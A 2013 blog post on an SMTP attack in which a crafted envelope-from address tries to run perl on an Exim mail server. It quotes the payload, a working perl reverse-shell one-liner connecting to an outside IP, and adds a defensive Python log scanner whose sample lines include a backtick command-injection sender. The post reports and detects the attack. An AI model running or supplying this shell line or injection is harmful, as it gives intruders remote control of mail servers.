Sunday, May 5, 2013

SMTP: envelope-from address tries to execute perl

earlier today, found this:
(and someone else, too.)
of course, no one wants to execute the downloaded file a.pl:
perl -e 'use Socket;$i="178.218.211.118";$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
not sure yet which MTA is vulnerable.

...in the meantime i found RedTeam Pentesting GmbH has a detailed advisory on the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here
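As an added example (not part of the original post), a small checker that pulls the envelope sender out of Exim mainlog arrival records and flags any local part carrying shell metacharacters, which is what this attack relies on; the log lines, message ids and hosts below are constructed, and the record layout is assumed to follow Exim's "<date> <time> <msgid> <= <sender> ..." form:

```python
import re

# Characters a POSIX shell interprets on an unescaped command line. A real
# mailbox never needs them in its local part, so their presence in an
# envelope sender is a strong signal whether or not the MTA is actually
# misconfigured.
SHELL_META = re.compile(r'[`;|&<>]|\$\(|\$\{')

# Exim mainlog arrival record: "<date> <time> <msgid> <= <sender> ...".
# The sender is a quoted local part ("..."@domain), a bare address,
# or "<>" for the null sender.
ARRIVAL = re.compile(r'^\S+ \S+ (?P<msgid>\S+) <= (?P<sender>"(?:[^"\\]|\\.)*"@\S+|\S+)')

# Constructed sample log lines (not real traffic); the third carries a
# command in the quoted local part, the way the sender described above does.
SAMPLE_MAINLOG = [
    '2013-05-05 09:12:41 1UYbQx-0001Ab-2K <= alice@example.org H=mx.example.org [192.0.2.10] P=esmtp S=2231',
    '2013-05-05 09:13:07 1UYbRM-0001Ac-7Q <= <> H=bounce.example.net [192.0.2.11] P=esmtp S=880',
    '2013-05-05 09:15:52 1UYbU3-0001Ad-1F <= "`perl /tmp/a.pl`"@localhost H=(x) [198.51.100.23] P=esmtp S=412',
    '2013-05-05 09:16:10 1UYbUL-0001Ae-9Z <= "bob smith"@example.com H=mail.example.com [192.0.2.12] P=esmtp S=1507',
]

def local_part(sender: str) -> str:
    """Return the local part of an envelope address, unquoting an RFC 5321 quoted string."""
    if sender == '<>':                      # null sender (bounces) has no local part
        return ''
    if sender.startswith('"'):
        end = sender.rfind('"@')
        quoted = sender[1:end] if end > 0 else sender[1:]
        return re.sub(r'\\(.)', r'\1', quoted)   # collapse quoted-pairs like \" or \\
    return sender.rsplit('@', 1)[0]

def is_suspicious_sender(sender: str) -> bool:
    """True when the local part contains something only a shell would want."""
    return SHELL_META.search(local_part(sender)) is not None

def scan_mainlog(lines):
    """Return (message id, sender) for every arrival whose sender looks like a command."""
    hits = []
    for line in lines:
        m = ARRIVAL.match(line)
        if m and is_suspicious_sender(m.group('sender')):
            hits.append((m.group('msgid'), m.group('sender')))
    return hits

if __name__ == '__main__':
    for msgid, sender in scan_mainlog(SAMPLE_MAINLOG):
        print(f'{msgid}: suspicious envelope sender {sender!r}')
```

A legitimate quoted local part such as "bob smith" is not flagged, and the null sender is skipped, so the check can run over a whole mainlog without drowning in noise.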

2 comments:

Anonymous said...

Any news on this? I received three of these yesterday on my LAMP webserver; this is the first attempt detected.

I searched on Google but I only found this blog entry.

iiegn said...

RedTeam Pentesting GmbH has a detailed evaluation of the problem: Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution - here